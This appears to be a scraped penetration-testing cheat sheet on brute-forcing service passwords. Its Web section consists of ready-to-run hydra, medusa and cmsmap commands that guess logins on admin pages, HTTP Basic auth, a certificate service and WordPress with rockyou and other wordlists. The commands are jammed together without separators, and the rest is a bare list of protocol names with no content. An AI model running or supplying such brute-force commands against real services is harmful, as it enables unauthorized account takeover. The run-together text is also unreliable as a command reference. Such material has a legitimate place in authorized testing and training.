Brute-force service password
Web
hydra 10.0.0.1 http-post-form “/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid” -P /usr/share/wordlists/rockyou.txt -l adminhydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.201 http-head "/" -F -m "Authorization: Basic admin:^PASS^" -t 10hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -Vcmsmap -f W/J/D/M -u a -p a https://wordpress.comhydra -L ./webapp.txt -P ./webapp.txt $ip http-get /adminSSH
SNMP
Remote Desktop Protocol
AFP
AJP
Cassandra Apache
CouchDB
FTP
IMAP
IRC
ISCSI
LDAP
Mongo
MySQL
OracleSQL
POP3
PostgreSQL
PPTP
Redis
Rexec
Rlogin
Rsh
Rsync
RTSP
SMB
Telnet
VNC
SMTP
Last updated